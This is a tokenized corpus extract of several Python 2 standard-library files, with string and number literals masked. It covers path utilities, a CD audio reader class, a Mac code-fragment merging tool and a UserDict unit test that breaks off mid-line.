splitdrive ( s ) [ <NUM_LIT:1> ] <EOL> return s != '<STR_LIT>' and s [ : <NUM_LIT:1> ] in '<STR_LIT>' <EOL> def join ( a , * p ) : <EOL> """<STR_LIT>""" <EOL> path = a <EOL> for b in p : <EOL> if isabs ( b ) : <EOL> path = b <EOL> elif path == '<STR_LIT>' or path [ - <NUM_LIT:1> : ] in '<STR_LIT>' : <EOL> path = path + b <EOL> else : <EOL> path = path + '<STR_LIT:/>' + b <EOL> return path <EOL> def splitdrive ( p ) : <EOL> """<STR_LIT>""" <EOL> if p [ <NUM_LIT:1> : <NUM_LIT:2> ] == '<STR_LIT::>' : <EOL> return p [ <NUM_LIT:0> : <NUM_LIT:2> ] , p [ <NUM_LIT:2> : ] <EOL> return '<STR_LIT>' , p <EOL> def splitunc ( p ) : <EOL> """<STR_LIT>""" <EOL> if p [ <NUM_LIT:1> : <NUM_LIT:2> ] == '<STR_LIT::>' : <EOL> return '<STR_LIT>' , p <EOL> firstTwo = p [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> if firstTwo == '<STR_LIT:/>' * <NUM_LIT:2> or firstTwo == '<STR_LIT:\\>' * <NUM_LIT:2> : <EOL> normp = normcase ( p ) <EOL> index = normp . 
find ( '<STR_LIT:/>' , <NUM_LIT:2> ) <EOL> if index == - <NUM_LIT:1> : <EOL> return ( "<STR_LIT>" , p ) <EOL> index = normp . find ( '<STR_LIT:/>' , index + <NUM_LIT:1> ) <EOL> if index == - <NUM_LIT:1> : <EOL> index = len ( p ) <EOL> return p [ : index ] , p [ index : ] <EOL> return '<STR_LIT>' , p <EOL> def split ( p ) : <EOL> """<STR_LIT>""" <EOL> d , p = splitdrive ( p ) <EOL> i = len ( p ) <EOL> while i and p [ i - <NUM_LIT:1> ] not in '<STR_LIT>' : <EOL> i = i - <NUM_LIT:1> <EOL> head , tail = p [ : i ] , p [ i : ] <EOL> head2 = head <EOL> while head2 and head2 [ - <NUM_LIT:1> ] in '<STR_LIT>' : <EOL> head2 = head2 [ : - <NUM_LIT:1> ] <EOL> head = head2 or head <EOL> return d + head , tail <EOL> def splitext ( p ) : <EOL> """<STR_LIT>""" <EOL> root , ext = '<STR_LIT>' , '<STR_LIT>' <EOL> for c in p : <EOL> if c in [ '<STR_LIT:/>' , '<STR_LIT:\\>' ] : <EOL> root , ext = root + ext + c , '<STR_LIT>' <EOL> elif c == '<STR_LIT:.>' : <EOL> if ext : <EOL> root , ext = root + ext , c <EOL> else : <EOL> ext = c <EOL> elif ext : <EOL> ext = ext + c <EOL> else : <EOL> root = root + c <EOL> return root , ext <EOL> def basename ( p ) : <EOL> """<STR_LIT>""" <EOL> return split ( p ) [ <NUM_LIT:1> ] <EOL> def dirname ( p ) : <EOL> """<STR_LIT>""" <EOL> return split ( p ) [ <NUM_LIT:0> ] <EOL> def commonprefix ( m ) : <EOL> "<STR_LIT>" <EOL> if not m : return '<STR_LIT>' <EOL> s1 = min ( m ) <EOL> s2 = max ( m ) <EOL> n = min ( len ( s1 ) , len ( s2 ) ) <EOL> for i in xrange ( n ) : <EOL> if s1 [ i ] != s2 [ i ] : <EOL> return s1 [ : i ] <EOL> return s1 [ : n ] <EOL> def getsize ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . st_size <EOL> def getmtime ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . st_mtime <EOL> def getatime ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . st_atime <EOL> def getctime ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . 
st_ctime <EOL> def islink ( path ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def exists ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> st = os . stat ( path ) <EOL> except os . error : <EOL> return False <EOL> return True <EOL> lexists = exists <EOL> def isdir ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> st = os . stat ( path ) <EOL> except os . error : <EOL> return False <EOL> return stat . S_ISDIR ( st . st_mode ) <EOL> def isfile ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> st = os . stat ( path ) <EOL> except os . error : <EOL> return False <EOL> return stat . S_ISREG ( st . st_mode ) <EOL> def ismount ( path ) : <EOL> """<STR_LIT>""" <EOL> unc , rest = splitunc ( path ) <EOL> if unc : <EOL> return rest in ( "<STR_LIT>" , "<STR_LIT:/>" , "<STR_LIT:\\>" ) <EOL> p = splitdrive ( path ) [ <NUM_LIT:1> ] <EOL> return len ( p ) == <NUM_LIT:1> and p [ <NUM_LIT:0> ] in '<STR_LIT>' <EOL> def walk ( top , func , arg ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> names = os . listdir ( top ) <EOL> except os . error : <EOL> return <EOL> func ( arg , top , names ) <EOL> exceptions = ( '<STR_LIT:.>' , '<STR_LIT:..>' ) <EOL> for name in names : <EOL> if name not in exceptions : <EOL> name = join ( top , name ) <EOL> if isdir ( name ) : <EOL> walk ( name , func , arg ) <EOL> def expanduser ( path ) : <EOL> """<STR_LIT>""" <EOL> if path [ : <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> return path <EOL> i , n = <NUM_LIT:1> , len ( path ) <EOL> while i < n and path [ i ] not in '<STR_LIT>' : <EOL> i = i + <NUM_LIT:1> <EOL> if i == <NUM_LIT:1> : <EOL> if '<STR_LIT>' in os . environ : <EOL> userhome = os . environ [ '<STR_LIT>' ] <EOL> elif not '<STR_LIT>' in os . environ : <EOL> return path <EOL> else : <EOL> try : <EOL> drive = os . environ [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> drive = '<STR_LIT>' <EOL> userhome = join ( drive , os . 
environ [ '<STR_LIT>' ] ) <EOL> else : <EOL> return path <EOL> return userhome + path [ i : ] <EOL> def expandvars ( path ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:$>' not in path : <EOL> return path <EOL> import string <EOL> varchars = string . letters + string . digits + '<STR_LIT>' <EOL> res = '<STR_LIT>' <EOL> index = <NUM_LIT:0> <EOL> pathlen = len ( path ) <EOL> while index < pathlen : <EOL> c = path [ index ] <EOL> if c == '<STR_LIT>' : <EOL> path = path [ index + <NUM_LIT:1> : ] <EOL> pathlen = len ( path ) <EOL> try : <EOL> index = path . index ( '<STR_LIT>' ) <EOL> res = res + '<STR_LIT>' + path [ : index + <NUM_LIT:1> ] <EOL> except ValueError : <EOL> res = res + path <EOL> index = pathlen - <NUM_LIT:1> <EOL> elif c == '<STR_LIT:$>' : <EOL> if path [ index + <NUM_LIT:1> : index + <NUM_LIT:2> ] == '<STR_LIT:$>' : <EOL> res = res + c <EOL> index = index + <NUM_LIT:1> <EOL> elif path [ index + <NUM_LIT:1> : index + <NUM_LIT:2> ] == '<STR_LIT:{>' : <EOL> path = path [ index + <NUM_LIT:2> : ] <EOL> pathlen = len ( path ) <EOL> try : <EOL> index = path . index ( '<STR_LIT:}>' ) <EOL> var = path [ : index ] <EOL> if var in os . environ : <EOL> res = res + os . environ [ var ] <EOL> except ValueError : <EOL> res = res + path <EOL> index = pathlen - <NUM_LIT:1> <EOL> else : <EOL> var = '<STR_LIT>' <EOL> index = index + <NUM_LIT:1> <EOL> c = path [ index : index + <NUM_LIT:1> ] <EOL> while c != '<STR_LIT>' and c in varchars : <EOL> var = var + c <EOL> index = index + <NUM_LIT:1> <EOL> c = path [ index : index + <NUM_LIT:1> ] <EOL> if var in os . environ : <EOL> res = res + os . environ [ var ] <EOL> if c != '<STR_LIT>' : <EOL> res = res + c <EOL> else : <EOL> res = res + c <EOL> index = index + <NUM_LIT:1> <EOL> return res <EOL> def normpath ( path ) : <EOL> """<STR_LIT>""" <EOL> path = path . 
replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> prefix , path = splitdrive ( path ) <EOL> while path [ : <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> prefix = prefix + '<STR_LIT:/>' <EOL> path = path [ <NUM_LIT:1> : ] <EOL> comps = path . split ( '<STR_LIT:/>' ) <EOL> i = <NUM_LIT:0> <EOL> while i < len ( comps ) : <EOL> if comps [ i ] == '<STR_LIT:.>' : <EOL> del comps [ i ] <EOL> elif comps [ i ] == '<STR_LIT:..>' and i > <NUM_LIT:0> and comps [ i - <NUM_LIT:1> ] not in ( '<STR_LIT>' , '<STR_LIT:..>' ) : <EOL> del comps [ i - <NUM_LIT:1> : i + <NUM_LIT:1> ] <EOL> i = i - <NUM_LIT:1> <EOL> elif comps [ i ] == '<STR_LIT>' and i > <NUM_LIT:0> and comps [ i - <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> del comps [ i ] <EOL> else : <EOL> i = i + <NUM_LIT:1> <EOL> if not prefix and not comps : <EOL> comps . append ( '<STR_LIT:.>' ) <EOL> return prefix + '<STR_LIT:/>' . join ( comps ) <EOL> def abspath ( path ) : <EOL> """<STR_LIT>""" <EOL> if not isabs ( path ) : <EOL> path = join ( os . getcwd ( ) , path ) <EOL> return normpath ( path ) <EOL> realpath = abspath <EOL> supports_unicode_filenames = False </s>
<s> import cd , CD <EOL> class Error ( Exception ) : <EOL> pass <EOL> class _Stop ( Exception ) : <EOL> pass <EOL> def _doatime ( self , cb_type , data ) : <EOL> if ( ( data [ <NUM_LIT:0> ] * <NUM_LIT> ) + data [ <NUM_LIT:1> ] ) * <NUM_LIT> + data [ <NUM_LIT:2> ] > self . end : <EOL> raise _Stop <EOL> func , arg = self . callbacks [ cb_type ] <EOL> if func : <EOL> func ( arg , cb_type , data ) <EOL> def _dopnum ( self , cb_type , data ) : <EOL> if data > self . end : <EOL> raise _Stop <EOL> func , arg = self . callbacks [ cb_type ] <EOL> if func : <EOL> func ( arg , cb_type , data ) <EOL> class Readcd : <EOL> def __init__ ( self , * arg ) : <EOL> if len ( arg ) == <NUM_LIT:0> : <EOL> self . player = cd . open ( ) <EOL> elif len ( arg ) == <NUM_LIT:1> : <EOL> self . player = cd . open ( arg [ <NUM_LIT:0> ] ) <EOL> elif len ( arg ) == <NUM_LIT:2> : <EOL> self . player = cd . open ( arg [ <NUM_LIT:0> ] , arg [ <NUM_LIT:1> ] ) <EOL> else : <EOL> raise Error , '<STR_LIT>' <EOL> self . list = [ ] <EOL> self . callbacks = [ ( None , None ) ] * <NUM_LIT:8> <EOL> self . parser = cd . createparser ( ) <EOL> self . playing = <NUM_LIT:0> <EOL> self . end = <NUM_LIT:0> <EOL> self . status = None <EOL> self . trackinfo = None <EOL> def eject ( self ) : <EOL> self . player . eject ( ) <EOL> self . list = [ ] <EOL> self . end = <NUM_LIT:0> <EOL> self . listindex = <NUM_LIT:0> <EOL> self . status = None <EOL> self . trackinfo = None <EOL> if self . playing : <EOL> raise _Stop <EOL> def pmsf2msf ( self , track , min , sec , frame ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> if track < self . status [ <NUM_LIT:5> ] or track > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> if not self . trackinfo : <EOL> self . cacheinfo ( ) <EOL> start , total = self . 
trackinfo [ track ] <EOL> start = ( ( start [ <NUM_LIT:0> ] * <NUM_LIT> ) + start [ <NUM_LIT:1> ] ) * <NUM_LIT> + start [ <NUM_LIT:2> ] <EOL> total = ( ( total [ <NUM_LIT:0> ] * <NUM_LIT> ) + total [ <NUM_LIT:1> ] ) * <NUM_LIT> + total [ <NUM_LIT:2> ] <EOL> block = ( ( min * <NUM_LIT> ) + sec ) * <NUM_LIT> + frame <EOL> if block > total : <EOL> raise Error , '<STR_LIT>' <EOL> block = start + block <EOL> min , block = divmod ( block , <NUM_LIT> * <NUM_LIT> ) <EOL> sec , frame = divmod ( block , <NUM_LIT> ) <EOL> return min , sec , frame <EOL> def reset ( self ) : <EOL> self . list = [ ] <EOL> def appendtrack ( self , track ) : <EOL> self . appendstretch ( track , track ) <EOL> def appendstretch ( self , start , end ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> if not start : <EOL> start = <NUM_LIT:1> <EOL> if not end : <EOL> end = self . status [ <NUM_LIT:6> ] <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> if end < self . status [ <NUM_LIT:5> ] or end > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> else : <EOL> l = len ( end ) <EOL> if l == <NUM_LIT:4> : <EOL> prog , min , sec , frame = end <EOL> if prog < self . status [ <NUM_LIT:5> ] or prog > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> end = self . pmsf2msf ( prog , min , sec , frame ) <EOL> elif l != <NUM_LIT:3> : <EOL> raise Error , '<STR_LIT>' <EOL> if type ( start ) == type ( <NUM_LIT:0> ) : <EOL> if start < self . status [ <NUM_LIT:5> ] or start > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> if len ( self . list ) > <NUM_LIT:0> : <EOL> s , e = self . list [ - <NUM_LIT:1> ] <EOL> if type ( e ) == type ( <NUM_LIT:0> ) : <EOL> if start == e + <NUM_LIT:1> : <EOL> start = s <EOL> del self . list [ - <NUM_LIT:1> ] <EOL> else : <EOL> l = len ( start ) <EOL> if l == <NUM_LIT:4> : <EOL> prog , min , sec , frame = start <EOL> if prog < self . status [ <NUM_LIT:5> ] or prog > self . 
status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> start = self . pmsf2msf ( prog , min , sec , frame ) <EOL> elif l != <NUM_LIT:3> : <EOL> raise Error , '<STR_LIT>' <EOL> self . list . append ( ( start , end ) ) <EOL> def settracks ( self , list ) : <EOL> self . list = [ ] <EOL> for track in list : <EOL> self . appendtrack ( track ) <EOL> def setcallback ( self , cb_type , func , arg ) : <EOL> if cb_type < <NUM_LIT:0> or cb_type >= <NUM_LIT:8> : <EOL> raise Error , '<STR_LIT>' <EOL> self . callbacks [ cb_type ] = ( func , arg ) <EOL> if self . playing : <EOL> start , end = self . list [ self . listindex ] <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> if cb_type != CD . PNUM : <EOL> self . parser . setcallback ( cb_type , func , arg ) <EOL> else : <EOL> if cb_type != CD . ATIME : <EOL> self . parser . setcallback ( cb_type , func , arg ) <EOL> def removecallback ( self , cb_type ) : <EOL> if cb_type < <NUM_LIT:0> or cb_type >= <NUM_LIT:8> : <EOL> raise Error , '<STR_LIT>' <EOL> self . callbacks [ cb_type ] = ( None , None ) <EOL> if self . playing : <EOL> start , end = self . list [ self . listindex ] <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> if cb_type != CD . PNUM : <EOL> self . parser . removecallback ( cb_type ) <EOL> else : <EOL> if cb_type != CD . ATIME : <EOL> self . parser . removecallback ( cb_type ) <EOL> def gettrackinfo ( self , * arg ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> if not self . trackinfo : <EOL> self . cacheinfo ( ) <EOL> if len ( arg ) == <NUM_LIT:0> : <EOL> return self . trackinfo [ self . status [ <NUM_LIT:5> ] : self . status [ <NUM_LIT:6> ] + <NUM_LIT:1> ] <EOL> result = [ ] <EOL> for i in arg : <EOL> if i < self . status [ <NUM_LIT:5> ] or i > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> result . append ( self . trackinfo [ i ] ) <EOL> return result <EOL> def cacheinfo ( self ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> self . 
trackinfo = [ ] <EOL> for i in range ( self . status [ <NUM_LIT:5> ] ) : <EOL> self . trackinfo . append ( None ) <EOL> for i in range ( self . status [ <NUM_LIT:5> ] , self . status [ <NUM_LIT:6> ] + <NUM_LIT:1> ) : <EOL> self . trackinfo . append ( self . player . gettrackinfo ( i ) ) <EOL> def cachestatus ( self ) : <EOL> self . status = self . player . getstatus ( ) <EOL> if self . status [ <NUM_LIT:0> ] == CD . NODISC : <EOL> self . status = None <EOL> raise Error , '<STR_LIT>' <EOL> def getstatus ( self ) : <EOL> return self . player . getstatus ( ) <EOL> def play ( self ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> size = self . player . bestreadsize ( ) <EOL> self . listindex = <NUM_LIT:0> <EOL> self . playing = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> func , arg = self . callbacks [ i ] <EOL> if func : <EOL> self . parser . setcallback ( i , func , arg ) <EOL> else : <EOL> self . parser . removecallback ( i ) <EOL> if len ( self . list ) == <NUM_LIT:0> : <EOL> for i in range ( self . status [ <NUM_LIT:5> ] , self . status [ <NUM_LIT:6> ] + <NUM_LIT:1> ) : <EOL> self . appendtrack ( i ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> if not self . playing : <EOL> if self . listindex >= len ( self . list ) : <EOL> return <EOL> start , end = self . list [ self . listindex ] <EOL> if type ( start ) == type ( <NUM_LIT:0> ) : <EOL> dummy = self . player . seektrack ( <EOL> start ) <EOL> else : <EOL> min , sec , frame = start <EOL> dummy = self . player . seek ( <EOL> min , sec , frame ) <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> self . parser . setcallback ( <EOL> CD . PNUM , _dopnum , self ) <EOL> self . end = end <EOL> func , arg = self . callbacks [ CD . ATIME ] <EOL> if func : <EOL> self . parser . setcallback ( CD . ATIME , func , arg ) <EOL> else : <EOL> self . parser . removecallback ( CD . ATIME ) <EOL> else : <EOL> min , sec , frame = end <EOL> self . parser . setcallback ( <EOL> CD . 
ATIME , _doatime , <EOL> self ) <EOL> self . end = ( min * <NUM_LIT> + sec ) * <NUM_LIT> + frame <EOL> func , arg = self . callbacks [ CD . PNUM ] <EOL> if func : <EOL> self . parser . setcallback ( CD . PNUM , func , arg ) <EOL> else : <EOL> self . parser . removecallback ( CD . PNUM ) <EOL> self . playing = <NUM_LIT:1> <EOL> data = self . player . readda ( size ) <EOL> if data == '<STR_LIT>' : <EOL> self . playing = <NUM_LIT:0> <EOL> self . listindex = self . listindex + <NUM_LIT:1> <EOL> continue <EOL> try : <EOL> self . parser . parseframe ( data ) <EOL> except _Stop : <EOL> self . playing = <NUM_LIT:0> <EOL> self . listindex = self . listindex + <NUM_LIT:1> <EOL> finally : <EOL> self . playing = <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> import Carbon . File <EOL> import struct <EOL> from Carbon import Res <EOL> import os <EOL> import sys <EOL> DEBUG = <NUM_LIT:0> <EOL> error = "<STR_LIT>" <EOL> BUFSIZE = <NUM_LIT> <EOL> def mergecfmfiles ( srclist , dst , architecture = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> srclist = list ( srclist ) <EOL> for i in range ( len ( srclist ) ) : <EOL> srclist [ i ] = Carbon . File . pathname ( srclist [ i ] ) <EOL> dst = Carbon . File . pathname ( dst ) <EOL> dstfile = open ( dst , "<STR_LIT:wb>" ) <EOL> rf = Res . FSpOpenResFile ( dst , <NUM_LIT:3> ) <EOL> try : <EOL> dstcfrg = CfrgResource ( ) <EOL> for src in srclist : <EOL> srccfrg = CfrgResource ( src ) <EOL> for frag in srccfrg . fragments : <EOL> if frag . architecture == '<STR_LIT>' and architecture == '<STR_LIT>' : <EOL> continue <EOL> if frag . architecture == '<STR_LIT>' and architecture == '<STR_LIT>' : <EOL> continue <EOL> dstcfrg . append ( frag ) <EOL> frag . copydata ( dstfile ) <EOL> cfrgres = Res . Resource ( dstcfrg . build ( ) ) <EOL> Res . UseResFile ( rf ) <EOL> cfrgres . AddResource ( '<STR_LIT>' , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> finally : <EOL> dstfile . close ( ) <EOL> rf = Res . CloseResFile ( rf ) <EOL> class CfrgResource : <EOL> def __init__ ( self , path = None ) : <EOL> self . version = <NUM_LIT:1> <EOL> self . fragments = [ ] <EOL> self . path = path <EOL> if path is not None and os . path . exists ( path ) : <EOL> currentresref = Res . CurResFile ( ) <EOL> resref = Res . FSpOpenResFile ( path , <NUM_LIT:1> ) <EOL> Res . UseResFile ( resref ) <EOL> try : <EOL> try : <EOL> data = Res . Get1Resource ( '<STR_LIT>' , <NUM_LIT:0> ) . data <EOL> except Res . Error : <EOL> raise Res . Error , "<STR_LIT>" , sys . exc_traceback <EOL> finally : <EOL> Res . CloseResFile ( resref ) <EOL> Res . UseResFile ( currentresref ) <EOL> self . parse ( data ) <EOL> if self . 
version < > <NUM_LIT:1> : <EOL> raise error , "<STR_LIT>" <EOL> def parse ( self , data ) : <EOL> ( res1 , res2 , self . version , <EOL> res3 , res4 , res5 , res6 , <EOL> self . memberCount ) = struct . unpack ( "<STR_LIT>" , data [ : <NUM_LIT:32> ] ) <EOL> data = data [ <NUM_LIT:32> : ] <EOL> while data : <EOL> frag = FragmentDescriptor ( self . path , data ) <EOL> data = data [ frag . memberSize : ] <EOL> self . fragments . append ( frag ) <EOL> def build ( self ) : <EOL> self . memberCount = len ( self . fragments ) <EOL> data = struct . pack ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:0> , self . version , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , self . memberCount ) <EOL> for frag in self . fragments : <EOL> data = data + frag . build ( ) <EOL> return data <EOL> def append ( self , frag ) : <EOL> self . fragments . append ( frag ) <EOL> class FragmentDescriptor : <EOL> def __init__ ( self , path , data = None ) : <EOL> self . path = path <EOL> if data is not None : <EOL> self . parse ( data ) <EOL> def parse ( self , data ) : <EOL> self . architecture = data [ : <NUM_LIT:4> ] <EOL> ( self . updatelevel , <EOL> self . currentVersion , <EOL> self . oldDefVersion , <EOL> self . stacksize , <EOL> self . applibdir , <EOL> self . fragtype , <EOL> self . where , <EOL> self . offset , <EOL> self . length , <EOL> self . res1 , self . res2 , <EOL> self . memberSize , ) = struct . unpack ( "<STR_LIT>" , data [ <NUM_LIT:4> : <NUM_LIT> ] ) <EOL> pname = data [ <NUM_LIT> : self . memberSize ] <EOL> self . name = pname [ <NUM_LIT:1> : <NUM_LIT:1> + ord ( pname [ <NUM_LIT:0> ] ) ] <EOL> def build ( self ) : <EOL> data = self . architecture <EOL> data = data + struct . pack ( "<STR_LIT>" , <EOL> self . updatelevel , <EOL> self . currentVersion , <EOL> self . oldDefVersion , <EOL> self . stacksize , <EOL> self . applibdir , <EOL> self . fragtype , <EOL> self . where , <EOL> self . offset , <EOL> self . length , <EOL> self . res1 , self . res2 ) <EOL> self . 
memberSize = len ( data ) + <NUM_LIT:2> + <NUM_LIT:1> + len ( self . name ) <EOL> if self . memberSize % <NUM_LIT:4> : <EOL> self . memberSize = self . memberSize + <NUM_LIT:4> - ( self . memberSize % <NUM_LIT:4> ) <EOL> data = data + struct . pack ( "<STR_LIT>" , self . memberSize , len ( self . name ) ) <EOL> data = data + self . name <EOL> data = data + '<STR_LIT>' * ( self . memberSize - len ( data ) ) <EOL> return data <EOL> def getfragment ( self ) : <EOL> if self . where < > <NUM_LIT:1> : <EOL> raise error , "<STR_LIT>" <EOL> f = open ( self . path , "<STR_LIT:rb>" ) <EOL> f . seek ( self . offset ) <EOL> if self . length : <EOL> frag = f . read ( self . length ) <EOL> else : <EOL> frag = f . read ( ) <EOL> f . close ( ) <EOL> return frag <EOL> def copydata ( self , outfile ) : <EOL> if self . where < > <NUM_LIT:1> : <EOL> raise error , "<STR_LIT>" <EOL> infile = open ( self . path , "<STR_LIT:rb>" ) <EOL> if self . length == <NUM_LIT:0> : <EOL> infile . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> self . length = infile . tell ( ) <EOL> infile . seek ( self . offset ) <EOL> offset = outfile . tell ( ) <EOL> if offset % <NUM_LIT:16> : <EOL> offset = offset + <NUM_LIT:16> - ( offset % <NUM_LIT:16> ) <EOL> outfile . seek ( offset ) <EOL> self . offset = offset <EOL> l = self . length <EOL> while l : <EOL> if l > BUFSIZE : <EOL> outfile . write ( infile . read ( BUFSIZE ) ) <EOL> l = l - BUFSIZE <EOL> else : <EOL> outfile . write ( infile . read ( l ) ) <EOL> l = <NUM_LIT:0> <EOL> infile . close ( ) </s>
<s> import unittest <EOL> from test import test_support , mapping_tests <EOL> import UserDict <EOL> d0 = { } <EOL> d1 = { "<STR_LIT>" : <NUM_LIT:1> } <EOL> d2 = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> } <EOL> d3 = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:3> , "<STR_LIT>" : <NUM_LIT:5> } <EOL> d4 = { "<STR_LIT>" : None , "<STR_LIT>" : None } <EOL> d5 = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:1> } <EOL> class UserDictTest ( mapping_tests . TestHashMappingProtocol ) : <EOL> type2test = UserDict . IterableUserDict <EOL> def test_all ( self ) : <EOL> u = UserDict . UserDict ( ) <EOL> u0 = UserDict . UserDict ( d0 ) <EOL> u1 = UserDict . UserDict ( d1 ) <EOL> u2 = UserDict . IterableUserDict ( d2 ) <EOL> uu = UserDict . UserDict ( u ) <EOL> uu0 = UserDict . UserDict ( u0 ) <EOL> uu1 = UserDict . UserDict ( u1 ) <EOL> uu2 = UserDict . UserDict ( u2 ) <EOL> self . assertEqual ( UserDict . UserDict ( one = <NUM_LIT:1> , two = <NUM_LIT:2> ) , d2 ) <EOL> self . assertEqual ( UserDict . UserDict ( [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] ) , d2 ) <EOL> self . assertEqual ( UserDict . UserDict ( dict = [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] ) , d2 ) <EOL> self . assertEqual ( UserDict . UserDict ( [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] , two = <NUM_LIT:3> , three = <NUM_LIT:5> ) , d3 ) <EOL> self . assertEqual ( UserDict . UserDict . fromkeys ( '<STR_LIT>' . split ( ) ) , d4 ) <EOL> self . assertEqual ( UserDict . UserDict ( ) . fromkeys ( '<STR_LIT>' . split ( ) ) , d4 ) <EOL> self . assertEqual ( UserDict . UserDict . fromkeys ( '<STR_LIT>' . split ( ) , <NUM_LIT:1> ) , d5 ) <EOL> self . assertEqual ( UserDict . UserDict ( ) . fromkeys ( '<STR_LIT>' . split ( ) , <NUM_LIT:1> ) , d5 ) <EOL> self . assert_ ( u1 . fromkeys ( '<STR_LIT>' . split ( ) ) is not u1 ) <EOL> self . assert_ ( isinstance ( u1 . fromkeys ( '<STR_LIT>' . split ( ) ) , UserDict . 
UserDict ) ) <EOL> self . assert_ ( isinstance ( u2 . fromkeys ( '<STR_LIT>' . split ( ) ) , UserDict . IterableUserDict ) ) <EOL> self . assertEqual ( str ( u0 ) , str ( d0 ) ) <EOL> self . assertEqual ( repr ( u1 ) , repr ( d1 ) ) <EOL> self . assertEqual ( ` u2 ` , ` d2 ` ) <EOL> all = [ d0 , d1 , d2 , u , u0 , u1 , u2 , uu , uu0 , uu1 , uu2 ] <EOL> for a in all : <EOL> for b in all : <EOL> self . assertEqual ( cmp ( a , b ) , cmp ( len ( a ) , len ( b ) ) ) <EOL> self . assertEqual ( u2 [ "<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertRaises ( KeyError , u1 . __getitem__ , "<STR_LIT>" ) <EOL> u3 = UserDict . UserDict ( u2 ) <EOL> u3 [ "<STR_LIT>" ] = <NUM_LIT:2> <EOL> u3 [ "<STR_LIT>" ] = <NUM_LIT:3> <EOL> del u3 [ "<STR_LIT>" ] <EOL> self . assertRaises ( KeyError , u3 . __delitem__ , "<STR_LIT>" ) <EOL> u3 . clear ( ) <EOL> self . assertEqual ( u3 , { } ) <EOL> u2a = u2 . copy ( ) <EOL> self . assertEqual ( u2a , u2 ) <EOL> u2b = UserDict . UserDict ( x = <NUM_LIT> , y = <NUM_LIT> ) <EOL> u2c = u2b . copy ( ) <EOL> self . assertEqual ( u2b , u2c ) <EOL> class MyUserDict ( UserDict . UserDict ) : <EOL> def display ( self ) : print self <EOL> m2 = MyUserDict ( u2 ) <EOL> m2a = m2 . copy ( ) <EOL> self . assertEqual ( m2a , m2 ) <EOL> m2 [ '<STR_LIT:foo>' ] = '<STR_LIT:bar>' <EOL> self . assertNotEqual ( m2a , m2 ) <EOL> self . assertEqual ( u2 . keys ( ) , d2 . keys ( ) ) <EOL> self . assertEqual ( u2 . items ( ) , d2 . items ( ) ) <EOL> self . assertEqual ( u2 . values ( ) , d2 . values ( ) ) <EOL> for i in u2 . keys ( ) : <EOL> self . assert_ ( u2 . has_key ( i ) ) <EOL> self . assert_ ( i in u2 ) <EOL> self . assertEqual ( u1 . has_key ( i ) , d1 . has_key ( i ) ) <EOL> self . assertEqual ( i in u1 , i in d1 ) <EOL> self . assertEqual ( u0 . has_key ( i ) , d0 . has_key ( i ) ) <EOL> self . assertEqual ( i in u0 , i in d0 ) <EOL> t = UserDict . UserDict ( ) <EOL> t . update ( u2 ) <EOL> self . 
